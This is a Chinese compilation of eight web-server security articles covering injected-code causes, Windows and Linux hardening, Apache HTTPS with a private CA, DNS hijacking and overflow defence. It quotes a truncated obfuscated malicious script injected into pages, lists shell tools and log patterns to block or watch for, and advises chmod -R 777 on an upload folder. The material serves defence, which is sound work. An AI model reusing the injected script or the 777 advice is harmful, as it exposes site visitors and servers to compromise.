下面是小编为大家整理的浅谈服务器或网站被植入病毒代码的原因WEB安全,本文共8篇,以供大家参考借鉴!
篇1:浅谈服务器或网站被植入病毒代码的原因WEB安全
一般来说,服务器或者网站被植入病毒代码有以下三种原因:
1、虚拟主机网站代码有问题,存在安全漏洞造成的,
如果服务器上大部分用户的网站都正常,只有少量用户网站被黑,那么就很可能是少量用户网站被黑的网站代码有问题,存在安全漏洞造成的。造成这个问题是没有办法解决,也不是服务商的责任。
大家都知道,“虚拟主机提供商”对自己的每个虚拟主机用户都分配了FSO文件操作的权限,他们通过您分配的合法权限,可以任意改动和上传的任何文件。如果用户没有保护好您分配给他们的合法权限,令 有机可乘,那么, 就可以利用合法权限对网站进行破坏了,但是大部分用户都认为这个 入侵不是他自己造成的,是服务商造成的,这实际上是冤枉了服务商,
例如,用户使用了一些不安全的程序(如“动网论坛”),这些程序的代码设计本身存在漏洞,很容易被 利用来上传网页木马, 可以操纵网页木马,利用合法权限来破坏您用户的数据和改动网页的文件,甚至导致网站完全打不开。这些手法是最常见的“客户的网站代码有问题,存在安全漏洞造成的”。
2、是服务器被入侵导致的。
当服务器上所有网站都被植入了病毒代码,并且可以在源文件的尾部或头部找到病毒代码文件,或者在IIS里面被植入了添加脚本,就标明是由于服务器被入侵导致的。
3、是服务器所在的机房中了ARP病毒导致的。
当服务器上所有网站都被植入了病毒代码,并且在源文件的尾部或头部无法找到病毒代码文件,就表明服务器所在的机房中了ARP病毒。这时需要联系我们来解决,一般情况下,机房会有大量服务器中毒,会有很多客户向机房反应,一般在半小时内机房就会处理的。
篇2:网站服务器一直被挂马的解决办法WEB安全
网站服务器总是被挂木马,网站的头部被注入了大量的js代码,弄了好久终于解决了,问题的根源是在配置lampp服务器的时候,为了简单方便,给网站根目录赋予了777权限,给了 可趁之机。解决问题的思路就是把权限配置合理。具体方法如下:
1.重新安装linux系统:后台选择32bit ubunt
2.下载xampp服务器: wget url
3.解压xampp: tar xvfz xampp-linux-1.7.3a.tar.gz -C /opt
备注:压缩文件用tar -zcvf ***.tar.gz 文件夹
4.启动服务器:/opt/lampp/lampp start
5.设置安全密码:/opt/lampp/lampp security
6.从其他服务器上拷贝备份文件:scp root@ip:文件位置/文件名 文件名(文件已经备份过)
7.恢复etc/extra/httpd-vhosts.conf,
8.修改extra/httpd.conf,最后一行加入httpd-vhosts.conf
9.修改数据库导入数据文件大小的限制:extra/php.ini
10.新建用户:adduser ×××
11.新建用户组:addgroup ×××
12.给已有的用户增加工作组 usermod -G groupname username
13.改变htdocs文件夹下网站所属用户 chown -R user file,以此用户名和密码来登录FTP,
14.改变网站中上传图片目录的权限为777:chmod -R 777 图片文件夹
篇3:网站建设如何提高服务器的安全性WEB安全
一、安全漏洞
1、在Web服务器上不允许他人访问的秘密文件、目录或重要数据。
2、利用远程用户向服务器发送信息时,特别是信用卡之类的东西时,中途遭到不法分子的非法拦截。
3、Web服务器本身存在的一些漏洞,使一些人能侵入到主机系统中,破坏一些重要的数据,甚至会造成系统瘫痪。
4、CGI安全方面的漏洞包括
(1)有意或无意在主机的系统中遗漏Bugs给非法 创造有利条件。
(2)用CGI脚本编写的程序当涉及到远程用户从浏览器中输入表格(Form),并进行检索(Searchindex),或form-mail之类在主机上直接操作命令时,或许会给Web主机系统造成危险。
5、还有一些简单的从网上下载的Web服务器,没有考虑到一些安全因素,不能用作商业应用。
因此,不管是配置服务器,还是在编写CGI程序时都要注意系统的安全性,
尽量堵住任何存在的漏洞,创造安全的环境。
二、提高系统的安全性和稳定性
Web服务器安全预防措施:
1、限制在Web服务器开设账户,定期删除一些断进程的用户。
2、对于在Web服务器上开设的账户,在口令长度及定期更改方面作出相关要求,防止被盗用。
3、尽量使用FTP、MAIL等服务器与之分开,去掉ftp,sendmail,tftp,NIS,NFS,finger,netstat等一些无关的应用。
4、在Web服务器上去掉一些绝对不用的解释器,即当在你的CGI的程序中没用到PERL时,就尽量把PERL从系统解释器中删除掉。
5、定期查看服务器中的日志logs文件,分析一切可疑的事件。在errorlog中出现rm,login,/bin/perl,/bin/sh等之类的记录时,你的服务器就很可能已经受到了一些非法用户的入侵。
6.设置好Web服务器上系统文件的权限和属性,对于可以让人访问的文档分配一个公用的组,并只分配只读的权利。把所有的HTML文件归属这个组,由Web管理员管理这个组。对于Web的配置文件仅对Web管理员有写的权利。
篇4:Windows系统服务器(网站)安全注意事项病毒防范
年未了,网络安全越发显得重要,最近攻击事件是越来越多了,对于站长来说有时简直就是个恶梦,
这里我针对自己做站的一些安全经验,跟大家一起分享,也许我说的你可能觉得太简单,但是我希望可能还有一些朋友正需要这些信息,能帮到一二个也对得起我写这篇文章了。
1、服务器限端口
安装好系统,先限用tcp/ip端口筛选功能,开放你需要的一些端口,其它的都不要开,仅开放80、21(20)、3389(远程管理)。
当然用自带的软件防火墙也可以。
2、打好所有的补丁
这点不解释了
3、装好杀毒软件(可选)
如果你是多人使用的话,建议还是装上的好,以防万一,如果你自己用,而且能保证上传的没有毒的话可以不装。
4、开启自动更新,但人工安装
这样你可以让它后台下载,安装时也可以选择性安装。
5、禁用一些脚本组件,至少也得改个名之类
6、禁用guest用户,更名administrator ,然后把密码设的复杂一些,包含一些特殊符,
7、禁用一些默认的服务,关于这点,网上有很多文章介绍,我就不细说了,需要的朋友网上找一下吧。
8、禁用cmd.exe,禁用net.exe (这样不充许命令装态添加用户了)
9、为web目录单独设权限
10、为每一个站点单独设一个用户,然后绑到web目录下面。
11、有上传功能的网站,把那个上传的目录,在iis里设为不可运行脚本,运行权限为无。
12、针对不需要写操作的那些网站目录,最好将目录写入权去掉,只读即可。
13、为了防止动态脚本被人恶意修改,也可以把脚本文件设为只读+可运行
14、如果装有mssql的话,要删除禁用那些危险的系统存储过程,这个网上有很多,找一下吧。
15、asp网站特别要防止sql注入。 尽可能的加入防注入代码。
16、ftp要管好,不要支持匿名访问,密码不要太简单了,最好改掉默认21端口号
17、如不需要,禁止1433,1434端口
18、经常查查日志,最好养成习惯。
19、尽量不要在服务器上装你不熟的软件
20、尽量不要在服务器上使用ie或其它浏览器上网
21、尽量不要在服务器上使用outlook或是其它邮件客户端
当然,希望大家的网站都能平安!
篇5:网站被 泛解析后的解决方法WEB安全
这几天博友看看GPS地图网跟我讲:哎,我的域名被泛解析了,域名后台加了一个**.oo 指向了一个IP,不知道是谁加上去的,如果不是用www.可能发现的早,因为我都是site:www.xx.com,没有去site:xx.com。如下图:
后来我搜下发现有很多这样的网站。
今天还是一个网友发现告诉我的,他说现在虽然我发现了,也停止了,但是他的权重会越来越高,就是说我的三级域名的权重会越来越高,数量越来越多,直到权重超过你的首页。
最近好多人加我,叫我出售泛解析,我都温婉的拒绝了,我也不知道这些人哪里来的,如果域名商的内部人员这么操作,这确实是一门生意。如果是域名商的话,这事就有的说了,如果是域名密码被知道了,只能认倒霉。其实一般都很少用到域名密码,都是直接登陆那注册的IDC网站,再去管理域名。
发现这个情况会就立刻删掉那域名解析,但问题还是有的,百度那边已经收录了,被泛解析后,直接就降权了,
今天给百度站长论坛提交了反馈不知道会不会处理。泛解析的域名是站长不能控制的,都是乱七八糟的字母。
域名商查的8份开始的,这是个另外一个网友的IDC通告,这倒好,IDC直接禁止了所有蜘蛛爬行。对我们站长来说影响也很大。
我:那你现在就是立刻停止解析域名和百度申诉了,其他的都没做?
答:没有做,其他的我也不知道要做什么了,改域名的管理密码就是了。
我:去和你的域名供应商联系一下,肯定是你的密码什么的泄露了。这样的情况,进入管理后台把里面的*解析删除,然后修改管理密码,如果还是被别人泛解析,那就该DNS服务器地址。
另外,如果网站域名被泛解析后,又被百度等搜索引擎收录了,就很麻烦了,如文中所讲先是去百度申诉,不过一般没戏。360提供了网页快照删除的申诉(地址),还不错。不过如果被百度标记为危险网站的话,可以考虑去知道创宇申诉。因为百度的是采用安全联盟的数据库。在站长工具网站被K申诉通道中,我记录了大部分的投诉通道。有兴趣的朋友可以去看看。
扩展阅读:泛解析是指将*.域名解析到同一IP。泛域名在实际使用中作用是非常广泛的,比如实现无限二级域名功能,提供免费的url转发,在IDC部门实现自动分配免费网址,在大型企业中实现网址分类管理等等,都发挥了巨大的作用。不过这一作用也会被他人所利用。如本文所讲。
篇6:Linux下Web服务器架构之网站安全解决方案WEB安全
HTTPS(全称:Hypertext Transfer Protocol over Secure Socket Layer),是以安全为目标的HTTP通道,简单讲是HTTP的安全版,即HTTP下加入SSL层,HTTPS的安全基础是SSL,因此加密的详细内容就需要SSL。 它是一个URI scheme(抽象标识符体系),句法类同http:体系。用于安全的HTTP数据传输。https:URL表明它使用了HTTP,但HTTPS存在不同于HTTP的默认端口及一个加密/身份验证层(在HTTP与TCP之间)。这个系统的最初研发由网景公司进行,提供了身份验证与加密通讯方法,现在它被广泛用于万维网上安全敏感的通讯,例如交易支付方面。
案例应用1:Web服务器架构之https
1. 企业实现要求:
某公司要求在公司内部自行搭建CA证书服务器,用于提高证书服务(在windows server 上实现);并且为公司内部的WWW服务器提供证书服务,提供正常服务。
2. 案例应用简化拓扑图:
3.案例实现步骤:
(1)在windows server2008上搭建CA证书服务器
(2)在web服务器上安装相应的软件
[root@www ~]# mkdir /mnt/cdrom
[root@www ~]# mount /dev/cdrom /mnt/cdrom/
[root@www ~]# cd /mnt/cdrom/Server/
[root@www Server]# rpm -ivh httpd-2.2.3-22.el5.i386.rpm
[root@www ~]# yum install -y mod_ssl
(3)配置web服务器的虚拟主机
#创建网页文件
[root@www www]# cat html/
--www
--xjzhujunjie
--/03/17
[root@www www]# cat tec/
--tec
--xjzhujunjie
--2012/03/17
[root@www www]# cat mkt/
--mkt
--xjzhujunjie
--2012/03/17
#编辑apache配置文件
[root@www ~]# vim /etc/httpd/conf/httpd.conf
134 Listen 80
973 NameVirtualHost 192.168.101.111:80
992
993 ServerAdmin master@junjie.com
994 DocumentRoot /var/www/html
995 ServerName www.junjie.com
996 ErrorLog logs/www-error_log
997 CustomLog logs/www-access_log common
998
999
1000 ServerAdmin master@junjie.com
1001 DocumentRoot /var/www/tec
1002 ServerName tec.junjie.com
1003 ErrorLog logs/tec-error_log
1004 CustomLog logs/tec-access_log common
1005
1006
1007 ServerAdmin master@junjie.com
1008 DocumentRoot /var/www/mkt
1009 ServerName mkt.junjie.com
1010 ErrorLog logs/mkt-error_log
1011 CustomLog logs/mkt-access_log common
1012
(4)重启web服务器,测试虚拟主机
[root@www ~]# service httpd restart #重启apache服务
Win7客户端测试在C:WindowsSystem32driversetchosts添加:
192.168.101.250 www.junjie.com
192.168.101.250 tec.junjie.com
192.168.101.250 mkt.junjie.com
Win7客户端使用IE9浏览器测试结果如下(虚拟主机完成):
(5)为web服务器申请证书
[root@www httpd]# mkdir certs
[root@www httpd]# cd certs/
[root@www certs]# openssl genrsa 1024 >httpd.key
[root@www certs]# chmod 600 httpd.key
CN/HENAN/ZHENGZHOU/zzu/junjie/www.junjie.com/xjzhujunjie@hotmail.com///
在linux的web服务器上启动桌面环境,用于申请证书
在firefox浏览器中输入192.168.101.112/certsrv来申请证书
选择申请证书,即可进入申请证书页面,将刚才生成的请求文件填写在下面
可以看到,此时证书服务器已经向web服务器返回信息,提示正在审核中
此时进入windows server 2008证书服务器上,开始审核web服务器申请的证书,选择挂起的证书,即可看到web服务器提交的申请信息
选择信息时,右键,所有任务,颁发证书,为web服务器颁发证书;接下来便可以在颁发的证书中看到已经颁发的证书;
Linux的web服务器再次在firefox浏览器中输入192.168.101.112/certsrv,查看挂起的证书,并下载证书
刚下载的证书,默认保存在桌面,将其移动到/etc/httpd/certs/下。
(6)修改web服务器证书文件
[root@junjie ~]# cd /etc/httpd/conf.d/ssl.conf
112 SSLCertificateFile /etc/httpd/certs/httpd.cer
119 SSLCertificateKeyFile /etc/httpd/certs/httpd.key
128 SSLCertificateChainFile /etc/httpd/certs/cacert.p7b
[root@www ~]# service httpd restart #重启apache服务
(7)win7客户端使用https安全访问网页
使用win7的IE9测试,输入安全网址www.junjie.com
,此时浏览器提示安全警告,提示此网站的安全证书有问题,并将警告信息显示出来,具体如下:
如若:用户强制继续访问,侧依然可以访问,但是浏览器地址栏中,已经变成红色报警信息,提示此网站不安全
说明:在此由于我没有使用IE9浏览器,没有解决证书问题,故又使用搜狗浏览器来解决证书错误问题!若,你可以帮助我解决请在本文留言,多谢了!
使用搜狗浏览器警报信息如下:
此时,选择查看证书-证书路径-查看安装根证书和web服务器证书
安装证书;
选择是继续安装证书,接着再查看就没有证书问题了,如下所示:
此时再win7下使用搜狗高速浏览器,Google Chrome 浏览器,Internet Explorer 9浏览器,都显示安全访问,如下所示:
***********************************************
案例应用1:Web服务器架构之https自签发
1.企业实现要求:
某公司要求在Linux上实现web服务器功能,并要求实现自签发证书(及要求:linux服务器即为web服务器又为证书服务器)
2.案例应用简化拓扑图:
3.案例实现步骤:
(1)在web服务器上安装相应的软件
[root@www ~]# mkdir /mnt/cdrom
[root@www ~]# mount /dev/cdrom /mnt/cdrom/
[root@www ~]# cd /mnt/cdrom/Server/
[root@www Server]# rpm -ivh httpd-2.2.3-22.el5.i386.rpm
[root@www ~]# yum install -y mod_ssl
(2)创建CA证书服务器的根证书文件
[root@www ~]# cd /etc/pki/
[root@www pki]# vim tls/openssl.cnf
45 dir =/etc/pki/CA # Where everything is kept
46 certs = $dir/certs # Where the issued certs are kept
47 crl_dir = $dir/crl # Where the issued crl are ke pt
48 database = $dir/index.txt # database index file.
51 new_certs_dir = $dir/newcerts # default place for new certs
53 certificate = $dir/cacert.pem # The CA certificate
54 serial = $dir/serial # The current serial number
58 private_key = $dir/private/cakey.pem# The private key
88 countryName = optional
89 stateOrProvinceName = optional
90 organizationName = optional
[root@www pki]# cd /etc/pki/CA/
[root@www CA]# mkdir certs crl newcerts
[root@www CA]# touch index.txt serial
[root@www CA]# echo “01” >serial
[root@www CA]# openssl genrsa 1024 >private/cakey.pem
Generating RSA private key, 1024 bit long modulus
........................++++++
....++++++
e is 65537 (0x10001)
[root@www CA]# chmod 600 private/cakey.pem
[root@www CA]# openssl req -new -x509 -key private/cakey.pem -out cacert.pem -days 365
Country Name (2 letter code) [GB]:CN
State or Province Name (full name) [Berkshire]:HENAN
Locality Name (eg, city) [Newbury]:ZHENGZHOU
Organization Name (eg, company) [My Company Ltd]:zzu
Organizational Unit Name (eg, section) []:junjie
Common Name (eg, your name or your server's hostname) []:rootca.junjie.com
Email Address []:master@junjie.com
(3)为web服务器的签发证书
[root@www CA]# mkdir /etc/httpd/certs
[root@www CA]#cd /etc/httpd/certs
[root@www certs]# openssl genrsa 1024 >httpd.key
Generating RSA private key, 1024 bit long modulus
..............++++++
........++++++
e is 65537 (0x10001)
[root@www certs]# chmod 600 httpd.key
[root@www certs]# openssl req -new -key httpd.key -out httpd.csr
Country Name (2 letter code) [GB]:CN
State or Province Name (full name) [Berkshire]:HENAN
Locality Name (eg, city) [Newbury]:ZHENGZHOU
Organization Name (eg, company) [My Company Ltd]:zzu
Organizational Unit Name (eg, section) []:junjie
Common Name (eg, your name or your server's hostname) []:www.junjie.com
///
[root@www certs]# openssl ca -in httpd.csr -out httpd.crt
[root@www certs]# chmod 600 *
(4)为web服务器的签发证书
[root@www certs]# cd /etc/httpd/conf.d
[root@www conf.d]# vim ssl.conf
112 SSLCertificateFile /etc/httpd/certs/httpd.crt
119 SSLCertificateKeyFile /etc/httpd/certs/httpd.key
128 SSLCertificateChainFile /etc/pki/CA/cacert.pem
(5)win7客户端使用https安全访问网页
[root@www ~]# service httpd restart #重启apache服务
Win7客户端测试在C:WindowsSystem32driversetchosts添加:
192.168.101.250 www.junjie.com
使用win7的IE9测试,输入安全网址www.junjie.com
,此时浏览器提示安全警告,提示此网站的安全证书有问题,并将警告信息显示出来,具体如下:
如若:用户强制继续访问,侧依然可以访问,但是浏览器地址栏中,已经变成红色报警信息,提示此网站不安全
说明:在此由于我没有使用IE9浏览器,没有解决证书问题,故又使用搜狗浏览器来解决证书错误问题!若,你可以帮助我解决请在本文留言,多谢了!
使用搜狗解决问题方案如下:
此时,选择查看证书-证书路径-查看安装根证书和web服务器证书
安装证书;
选择是继续安装证书,接着再查看就没有证书问题了,如下所示:
此时再win7下使用搜狗高速浏览器,Internet Explorer 9浏览器,都显示安全访问,如下所示:
查看证书信息:
篇7:如何清理网站被arp病毒插入js恶意代码?服务器教程
网页 入如下的arp病毒的js恶意代码
script.>document.writeln("x3Cx73x63x72x69x70x74x20x73x72x63x3Dx68x74x74x70x3Ax2Fx2Fx4Fx25x36x36x25x36x36x25x34x39x25x36x33x65x25x32x45x25x34x36x25x34x31x51...
首先确定你的服务器上原文件 是否有这些代码
就是说 服务器上文件是没有的 但客户端一运行 在客户端看源代码就有了
这样的话 服务器确实中了arp了 只需要在服务器上装一个简单的arp防火墙即可 360 金山的就行 重启服务器 立刻没有了
如果你服务器上的源文件都被修改了 那是你的程序 或 服务器本身有安全漏洞,
如何清理网站被arp病毒插入js恶意代码?服务器教程
,
把你的源码拿回来看下有没有被修改如果有就是你的程序问题
如果没有就可能是arp了.
篇8:降低服务器被溢出的可能性的安全技巧WEB安全
溢出是程序设计者设计时的不足所带来的错误,溢出也是是操作系统、应用软件永远的痛,在骇客频频攻击、系统漏洞层出不穷的今天,任何人都不能保证操作系统系统、应用程序不被溢出。既然溢出是必然的,并且利用溢出攻击的门槛又较低,有一定电脑基础的人都可以利用工具完成一次溢出。这样看来,电脑系统就处于随时被溢出的危险中,特别是肩负重任的服务器如果被溢出被渗透的话那后果不堪设想。我们总不能坐以待毙,做为网络管理人员,应该未雨绸廖做好防范工作,把服务器被溢出的可能性降到最低。
一 什么是溢出:
溢出是 利用操作系统的漏洞,专门开发了一种程序,加相应的参数运行后,就可以得到你电脑具有管理员资格的控制权,你在你自己电脑上能够运行的东西他可以全部做到,等于你的电脑就是他的了。
二 服务器溢出该如何防:
1、必须打齐补丁:
尽最大的可能性将系统的漏洞补丁都打完;MicrosoftWindowsServer系列的服务器系统可以将自动更新服务打开,然后让服务器在指定的某个时间段内自动连接到Microsoft Update网站进行补丁的更新。如果服务器为了安全起见禁止了对公网外部的连接的话,可以用Microsoft WSUS服务在内网进行升级。
2、服务最小化:
最少的服务等于最大的安全,停掉一切不需要的系统服务以及应用程序,最大限度地降底服务器的被攻击系数。比如前阵子的NDS溢出,就导致很多服务器挂掉了。其实如果WEB类服务器根本没有用到DNS服务时,大可以把DNS服务停掉,这样DNS溢出就对你们的服务器不构成任何威胁了。
3、端口过滤:
启动TCP/IP端口的过滤,仅打开服务器常用的TCP如21、80、25、110、3389等端口;如果安全要求级别高一点可以将UDP端口关闭,当然如果这样之后缺陷就是如在服务器上连外部就不方便连接了,这里建议大家用IPSec来封UDP。在协议筛选中只允许TCP协议、UDP协议 以及RDP协议等必需用协议即可;其它无用均不开放。
4、系统防火墙:
启用IPSec策略,为服务器的连接进行安全认证,给服务器加上双保险。封掉一些危险的端口,诸如:135 145 139 445 以及UDP对外连接之类、以及对通读进行加密与只与有信任关系的IP或者网络进行通讯等等。通过IPSec禁止UDP或者不常用TCP端口的对外访问就可以非常有效地防反弹类木马。
5、系统命令防御:
删除、移动、更名或者用访问控制表列Access Control Lists (ACLs)控制关键系统文件、命令及
文件夹:
(1)、 通常在溢出得到shell后,来用诸如net.exe、net1.exe、ipconfig.exe、user.exe、query.exe、 regedit.exe、regsvr32.exe 来达到进一步控制服务器的目的。如:加账号、克隆管理员了等等。我们可以将这些命令程序删除或者改名。 4 t( B+ L/ O- y.
提示:在删除与改名时先停掉文件复制服务 (FRS)或者先将 %windir%system32dllcache下的对应文件删除或改名。我爱电脑技术社区--打造最好的电
(2)、也或者将这些.exe文件移动到你指定的文件夹,这样也方便以后管理员自己使用,
(3)、访问控制表列ACLS控制:
找到%windir%system32下找到cmd.exe、cmd32.exe、net.exe、net1.exe、ipconfig.exe、tftp.exe、ftp.exe、user.exe、reg.exe、regedit.exe、regedt32.exe、regsvr32.exe这些 常用的文件,在“属性”→“安全”中对他们进行访问的ACLs用户进行定义,诸如只给administrator有权访问,如果需要防范一些溢出攻击、以及溢出成功后对这些文件的非法利用;那么我们只需要将system用户在ACLs中进行拒绝访问即可。
(4)、如果你觉得在GUI下面太麻烦的话,你也可以用系统命令的CACLS.EXE来对这些.exe文件的Acls进行编辑与修改,或者说将他写成一个.bat批处理文件来执行以及对这些命令进行修改。
(5)、对磁盘如C、D、E、F等进行安全的ACLS设置从整体安全上考虑的话也是很有必要的,另外特别要对Windows、WinntSystem、Document and Setting等文件夹。
6、组策略配置:
想禁用“cmd.exe”,执行“开始→运行”输入gpedit.msc打开组策略,选择“用户配置→管理模板→系统”,把“阻止访问命令提示符”设为“启用”。同样的可以通过组策略禁止其它比较危险的应用程序。
7、服务降级:
对一些以System权限运行的系统服务进行降级处理。比如:将Serv-U、Imail、IIS、Php、Mssql、Mysql等一系列以 System权限运行的服务或者应用程序换成其它administrators成员甚至users权限运行,这样就会安全得多了。但前提是需要对这些基本运行状态、调用API等相关情况较为了解。
小结:其实,关于防止如Overflow溢出类攻击的办法除了用上述的几点以外,还有很多种办法:比如通过注册表进行建立相应的键值,进行设置;写防护过滤程序用DLL方式加载windows到相关的SHell以及动态链接程序之中这类。当然自己写代码来进行验证加密就需要有相关深厚的Win32编程基础了,以及对Shellcode较有研究。
三 如何防止溢出获取Shell后对系统的进一步入侵
1、 在做好1中上述的工作之后,基本上可以防目骇客在溢出之后得到shell了;因为即使Overflow溢出成功,但在调用CMDSHELL、以及对外联接时就卡了。 (为什么呢,因为:1.溢出后程序无法再调用到CMDSHLL已经禁止system访问CMD.exe了。2.溢出之后在进行反弹时已经无法对外部IP进行连接了。所以,基本上要能过system权限来反弹shell就较困难的了...)
2、 当然世界上是不存在绝对的安全的,假设入侵者在得到了用户的shell之后,做些什么呢?一般入侵者在在得到shell之后,就会诸如利用系统命令加账号了 通过tftp、ftp、vbs等方式传文件了等等来达到进一步控制服务器。这里通过1上述的办法对命令进行了限制,入侵者是没有办法通过tftp、ftp来传文件了,但他们仍然可以能过echo写批处理,用批处理通过脚本BAT/VBS/VBA等从WEB上下载文件,以及修改其它盘类的文件等潜在破坏行为。所以用户需要 将echo命令也限制以及将其它盘的System写、修改文件的权限进行处理。以及将VBS/VBA类脚本以及XMLhttp等组件进行禁用或者限制system的运行权。这样的话别人得到Shell也无法对服务器上的文件进行删除以及进行步的控制系统了;以及本地提权反弹Shell了。
服务器的安全是个系统工程,任何小小的疏忽都有可以造成服务器的沦陷。“防”永远比“补”好,管理员“防”在溢出之前,把被攻击的危险降到最低,这才是真正的服务器安全之道。
文档为doc格式